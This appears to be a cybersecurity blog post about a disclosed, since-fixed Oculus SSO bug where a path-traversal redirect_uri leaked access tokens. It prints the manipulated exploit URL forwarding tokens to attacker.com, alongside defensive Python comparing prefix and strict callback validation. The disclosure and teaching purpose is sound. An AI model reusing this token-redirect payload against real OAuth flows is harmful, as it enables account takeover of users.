
Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover

Oculus Account Takeover: Oculus SSO “Account Linking” Bug Exposes Users to Account Takeover

A critical security vulnerability in Oculus’s “Account Linking” feature, discovered by bug hunter Youssef Sammouda, put users at risk of account takeover on third-party websites and in VR games and apps. The bug was reported on February 26, 2021, acknowledged by Facebook on March 2, 2021, and fixed on March 16, 2021.

The vulnerability allowed an attacker to manipulate the callback endpoint so that the Oculus access token was redirected to a website under the attacker’s control, which could lead to account takeover. This was possible because the value of the redirect_uri parameter was not required to match the callback configured in the organization’s SSO settings exactly, and because characters such as path-traversal sequences were not adequately filtered.

To exploit this bug, an attacker could modify the redirect_uri parameter, for example, from:

https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect&organization_id=695304644729285

to:

https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect/../../../../../../open_redirect?next=https://www.attacker.com&organization_id=695304644729285

The access token would then be sent to the attacker’s website, allowing them to log in to the victim’s Oculus account and potentially access other linked accounts in VR games and apps.
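The defensive lesson from the write-up is exact matching of redirect_uri against the registered callback, after normalizing the path. The following Python is an added example (not code from the article, from Sammouda’s write-up, or from Oculus/Meta): it puts a prefix-match validator, which behaves like the bug class described above, beside a strict validator. The callback URL and organization id are the ones quoted in the article; the registry dictionary, the function names and the extra host/port/userinfo checks are assumptions that go slightly beyond the page to cover related ways a redirect_uri can be bent.

```python
"""Validating an SSO/OAuth redirect_uri against a registered callback.

Added example, not part of the original article. Callback URL and organization id
come from the article; the registry layout and function names are assumptions.
"""
import posixpath
from urllib.parse import urlsplit

# Constructed registry: organization_id -> set of exact callback URIs.
REGISTERED_CALLBACKS = {
    "695304644729285": {
        "https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect",
    },
}

LEGIT_REDIRECT = (
    "https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect"
)
# The redirect_uri value from the article's manipulated request: dot segments climb out of
# the callback path and land on an open redirect that forwards to the attacker's site.
MANIPULATED_REDIRECT = LEGIT_REDIRECT + "/../../../../../../open_redirect?next=https://www.attacker.com"


def canonical_form(uri):
    """Reduce a URI to (scheme, host, port, normalized path); None if it cannot be parsed."""
    try:
        parts = urlsplit(uri)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.hostname is None:
        return None
    # posixpath.normpath collapses '.' and '..' segments the way a server or browser
    # resolves them, so the comparison is made on the *effective* path.
    path = posixpath.normpath(parts.path or "/")
    return (parts.scheme.lower(), parts.hostname.lower(), port, path)


def weak_prefix_check(organization_id, redirect_uri):
    """The bug class: a prefix match accepts anything appended after the registered callback."""
    return any(redirect_uri.startswith(cb) for cb in REGISTERED_CALLBACKS.get(organization_id, ()))


def strict_check(organization_id, redirect_uri):
    """Exact-match validation.

    Scheme, host, port and the normalized path must equal a registered callback, and no
    query string, fragment, userinfo or control/whitespace characters may ride along.
    """
    registered = REGISTERED_CALLBACKS.get(organization_id)
    if not registered:
        return False
    if any(ch in redirect_uri for ch in "\\\x00\r\n\t "):
        return False
    parts = urlsplit(redirect_uri)
    if parts.scheme.lower() != "https" or parts.query or parts.fragment:
        return False
    if parts.username is not None:  # e.g. https://expected-host@other-host/...
        return False
    candidate = canonical_form(redirect_uri)
    return candidate is not None and any(candidate == canonical_form(cb) for cb in registered)


def effective_target(redirect_uri):
    """Where the redirect would actually land after dot-segment resolution (scheme://host/path)."""
    form = canonical_form(redirect_uri)
    if form is None:
        return None
    scheme, host, port, path = form
    hostport = host if port is None else f"{host}:{port}"
    return f"{scheme}://{hostport}{path}"


if __name__ == "__main__":
    org = "695304644729285"
    for uri in (LEGIT_REDIRECT, MANIPULATED_REDIRECT):
        print(f"prefix-match: {weak_prefix_check(org, uri)}  strict: {strict_check(org, uri)}")
        print(f"  resolves to: {effective_target(uri)}")
```

Running it shows the prefix check accepting both URIs, while the strict check accepts only the registered callback; effective_target makes the reason visible, since the manipulated value resolves to https://forums.oculusvr.com/open_redirect rather than to the callback. A registry that stores several callbacks per organization still works with this code because each entry is compared in canonical form.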

Sammouda notes that this type of bug is common in OAuth authentication flows and emphasizes the importance of checking for small, common issues before looking for complex ones. Facebook has since fixed the issue and awarded Sammouda a $12000 bounty, including a bonus, for his discovery.

This incident highlights the importance of thorough security testing and responsible disclosure in ensuring the safety and security of users’ accounts. By working together with security researchers like Sammouda, companies can identify and address vulnerabilities before they can be exploited by malicious actors.

–Meta bug bounty program

Link to read full write up: https://ysamm.com/?p=697

Christin (https://secry.me/explore)
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.
